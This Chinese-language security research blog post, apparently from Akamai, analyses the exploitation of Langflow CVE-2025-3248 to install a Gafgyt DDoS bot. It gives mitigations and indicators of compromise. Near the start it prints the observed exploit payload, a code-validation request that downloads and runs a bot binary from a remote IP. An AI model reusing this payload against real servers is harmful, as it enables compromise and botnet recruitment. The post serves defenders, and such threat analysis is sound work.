恶意利用 Langflow 构建定制化 DDoS Gafgyt 僵尸网络

Larry Cashdollar

Jul 14, 2026

Larry Cashdollar

Larry Cashdollar 从事安全领域漏洞研究工作已有 20 多年,目前是 Akamai 安全情报响应团队的首席安全研究员。他曾在南缅因大学学习计算机科学专业。Larry 记录了 300 多个 CVE,曾在 BotConf、BSidesBoston、OWASP Rhode Island 和 DEF CON 等大会上介绍自己的研究成果。在闲暇时间,他喜欢户外运动和改装小型发动机。

分享

要点汇总

  • 攻击者正积极利用 Langflow 代码验证 API 端点中的一个远程代码执行 (RCE) 漏洞。Langflow 是一款用于构建 AI 和大语言模型 (LLM) 应用原型的热门可视化框架。

  • 一旦该框架失守,漏洞利用程序便会植入一个高度定制化的 Gafgyt 分布式拒绝服务 (DDoS) 爬虫程序变体。该特定载荷剥离了加密货币挖矿等次要功能,从而完全专注于网络流量横扫,并使用了一种复杂的改良版 RC4 流密码来隐藏其命令与控制 (C2) 通信,旨在绕过标准的自动化解码工具。

  • 由于企业 AI 研发迭代极快,团队往往频繁将 Langflow 等实验性工具部署在生产或测试网络中,却未能实施妥善的网络分段、防火墙防护或严格的出站流量过滤。这催生出了一个高度受信任的环境,导致恶意的出站 C2 流量能够轻易绕过企业级的过滤机制。

  • 筑牢 AI 基础架构的安全防线,必须回归基础的安全规范:修复 AI 编排平台中的任意代码执行缺陷、实施严格的出站流量过滤(例如阻断 1337 端口的越权流量)、通过 Web 应用程序防火墙 (WAF) 隔离开发环境,以及部署针对性的 YARA 签名。

过去几年,网络安全界始终在担忧高级 AI 威胁,例如自动化网络钓鱼、深度伪造以及自主恶意软件。然而,攻击者正用实际行动证明,他们的眼前目标要务实得多。他们不仅企图操纵 AI,更渴望劫持其底层基础架构,以此为传统的、海量化网络犯罪提供支持。

最新的威胁情报揭示了现代 AI 部署与经典僵尸网络架构之间一个极其罕见的交集:攻击者正积极利用 Langflow 中的 RCE 漏洞 CVE-2025-3248,以此来来植入老牌 Gafgyt/BASHLITE DDoS 爬虫程序的高度定制化变体。

在本博文中,我将详细介绍攻击者如何利用 CVE-2025-3248 漏洞,将前沿的 AI 框架转化为实施暴力攻击的网络武器。

初始突破口:CVE-2025-3248

Langflow Langflow 是一款备受开发者青睐的可视化框架,用于构建 AI 和 LLM 应用的原型并进行开发。由于此类应用天生需要具备测试和运行自定义逻辑的能力,因此其特定的端点本身就具备代码执行功能。

攻击者已利用这种能力反过来攻击该平台。在现网环境中,我们观察到以下针对其代码验证 API 的恶意载荷:

{
  "code": "import os; os.system(\"wget -q -O /tmp/bot_x86_64 http://184.174.96.191:8088/bot.x86_64 && chmod +x /tmp/bot_x86_64 && /tmp/bot_x86_64\")"
}

漏洞剖析

  • 漏洞根源/api/v1/validate/code 端点接收不可信的 Python 脚本,并在未实施妥善沙盒隔离的情况下直接在主机系统上执行。

  • 投递机制:被注入的代码利用标准 Python 库函数 (os.system) 来调用 wget

  • 凭据检索:程序从远程暂存服务器 (184.174.96.191:8088) 静默下载一个 x86_64 架构的 Linux 可执行文件,将其标记为可执行文件 (chmod +x),并直接从临时 /tmp 目录下启动该文件。

分析:Gafgyt/BASHLITE 变体

一旦在被入侵的 AI 服务器上执行,植入的文件 (bot.x86_64) 就会变成专属的远程控制网络武器。尽管它源自经典的 Gafgyt 家族,但我们的静态和动态分析表明,这并非一个简单的、由脚本小子复制粘贴而来的恶意载荷。其开发者已将标准的 DDoS 功能封装在复杂的自定义加密机制之中。

执行与规避行为

启动后,该二进制文件会执行一系列操作,以隐藏自身存在并准备其内部引擎:

  • 特征指纹:它向标准输出打印了一段带有挑衅性的 ASCII 横幅:come at me krebs rimasuta go BRRT(影射了知名安全记者 Brian Krebs 以及攻击者代号 rimasuta)。

  • 守护程序:它会立即调用 clone() 来派生一个子进程,同时父进程则退出。随后,它关闭标准输入、输出和错误描述符 (stdio),并彻底脱离终端以在后台静默运行。

  • 纯粹的攻击性:该二进制文件包含任何加密货币挖矿程序具备任何持久化机制,也没有横向移动扫描功能。其执行路径完全针对单一任务进行了优化:网络泛洪攻击。

自定义密码与 C2 协议

该变体实现了一种高级、多阶段的改良版 RC4 流密码,用以保护其 C2 通信。其加密方案在以下三个关键维度上偏离了标准 RC4 规范,旨在破坏标准的自动化解码工具:

  1. 非标准 S 盒种子:该加密方案并未对 S 盒进行线性初始化,而是利用自定义的等差数列对其进行填充:$S[i] = (0x0D + i \times 0xA7) \pmod{256}$。

  2. 双阶段密钥调度算法 (KSA):它使用硬编码的 32 位密钥(如 0xDEADBEEF、0xCAFEBABE 等)来改变 S 盒,然后通过经典的 Borland 线性同余生成器 (LCG) 进行五次高强度重排。

  3. 改进版伪随机生成算法 (PRGA):通过引入移位循环计数器和位运算(ROLSHR),对生成的密钥流字节实施进一步的混淆。

攻击能力

该爬虫程序具有四条截然不同的执行路径,直接映射到 sendto 系统调用,分别对应四种经典的拒绝服务攻击媒介:

 

状态

攻击媒介

技术机制

0x01

UDP 泛洪攻击

触发原始 sendto 循环,发送海量 UDP 数据报

0x02

TCP 泛洪攻击

发起高频连接并进行大规模 SYN/ACK 报文轰炸

0x03

HOLD 泛洪攻击

针对 Web 服务器实施长连接资源耗尽攻击

0x04

Junk/STD 泛洪攻击

投递随机载荷的 UDP 泛洪,旨在耗尽目标系统的状态表

AI 基础架构面临的战略风险

我们很容易将 AI 应用视为与企业其他 IT 技术栈相隔离的独立环境,但在攻击者眼中,它们却是极其诱人的黄金资产。劫持 AI 服务器并将其强行并入僵尸网络,能为黑客带来诸多独特的资源优势:

  • 海量算力与高带宽:AI 工作负载几乎总是托管在高性能云实例或稳健的企业级服务器上。这些机器天生拥有庞大的网络带宽,这正是发起毁灭性 DDoS 攻击必不可少的条件。

  • “影子 IT”漏洞隐患:由于 AI 研发正以惊人的速度迭代,研发团队往往频繁在生产或测试环境中直接搭建 Langflow 等实验性平台,却未能实施妥善的网络分段、漏洞管理或防火墙防护。

  • 可信的网络环境:企业云基础架构通常享有更广泛的出站网络权限,这导致恶意的出站 C2 流量能够轻易绕过企业常规的出站过滤机制。

防御与缓解

如果您的团队正在使用 Langflow 或类似的业务可视化 AI 编排平台,强烈建议立即针对当前的安全态势调整防御策略。

  • 修补与升级:确保您的 Langflow 部署已更新至最新安全版本,以彻底根除代码验证 API 中存在的任意代码执行缺陷。

  • 实施严格的出站流量过滤:AI 模型训练和原型开发环境极少需要向任意公网 IP 地址发起毫无约束的出站 TCP 访问。请果断阻止通过 1337 等异常端口发起的出站连接。

  • 网络隔离:将 AI 开发环境视为不可信的网络。利用 WAF(Web 应用程序防火墙)将其与企业核心主环境实施严格的微隔离,并限制其对公共互联网的访问。

  • 部署 YARA 签名:针对系统二进制文件以及临时目录实施持续监控,全力捕捉该攻击者特有的加密 S 盒种子特征字节码:0d b4 5b 02 a9 50 f7 9e

结语

对 CVE-2025-3248 漏洞的恶意利用给我们敲响了警钟:安全态势并非只是渐进式演进,而是正在发生颠覆性的结构质变。当我们将 Langflow 等强大的 AI 框架快速集成到企业系统中时,我们必须避免盲目地将这些平台视为独立或特定的封闭环境。攻击者敏锐地察觉到了这些环境中所蕴藏的庞大算力和带宽,并正企图利用那些历经数十年检验、曾滋养了僵尸网络的老旧策略,将这些全新资产彻底变成自己的攻击武器。

保障 AI 基础架构的安全,要求我们必须回归最基础的安全规范:实施稳健的网络分段、严格的出站流量过滤,以及保持高度警惕的补丁管理。在竞相构建下一代 AI 应用的竞赛中,我们绝不能让那些阴魂不散的陈旧威胁卷土重来。

技术附录:IOC 与防御机制

文件和系统哈希值

  • SHA256: e00d92ca28a2cfd75e96f71fc0408747f04942657fcab0f2a25ce79bc3ad23a8

  • ELF 内部版本 ID (SHA1)523ae28b0833f9a68f4264d16c803ca5fdc771b9

网络迹象

  • C2 服务器 IP184.174.96.191

  • 恶意软件暂存端口8088/TCP(HTTP 下载)

  • C2 指令端口1337/TCP(加密流量)

主机签名

  • 通过 1337 端口向外部 IP 发起的出站连接

  • 在临时 /tmp 下运行且启动后立即关闭标准文件描述符的未知进程

  • 标准输出日志或内存字符串中包含 come at me krebs rimasuta go BRRT 字符串

 
Larry Cashdollar

Jul 14, 2026

Larry Cashdollar

Larry Cashdollar 从事安全领域漏洞研究工作已有 20 多年,目前是 Akamai 安全情报响应团队的首席安全研究员。他曾在南缅因大学学习计算机科学专业。Larry 记录了 300 多个 CVE,曾在 BotConf、BSidesBoston、OWASP Rhode Island 和 DEF CON 等大会上介绍自己的研究成果。在闲暇时间,他喜欢户外运动和改装小型发动机。

标签

分享

相关博文

安全研究
CVE-2026-63030 和 CVE-2026-60137:缓解 WordPress 中一个严重的未经身份验证 RCE 链
了解 CVE-2026-63030 和 CVE-2026-60137(WordPress Core 中一个严重的未经身份验证 RCE 链)。了解攻击面以及如何做好防护。
安全研究
CVE-2026-48282:缓解 Adobe ColdFusion 中的高危漏洞
探究 Adobe ColdFusion 中的关键路径遍历漏洞 CVE-2026-48282。了解受影响的版本及关键补丁更新。
安全研究
MCP 新规来袭:安全团队备战指南
June 25, 2026
随着 MCP 演进至全新的无状态架构,安全责任正逐步转移到开发人员肩上。了解 Akamai 如何针对新版规范开展威胁建模,助您未雨绸缪。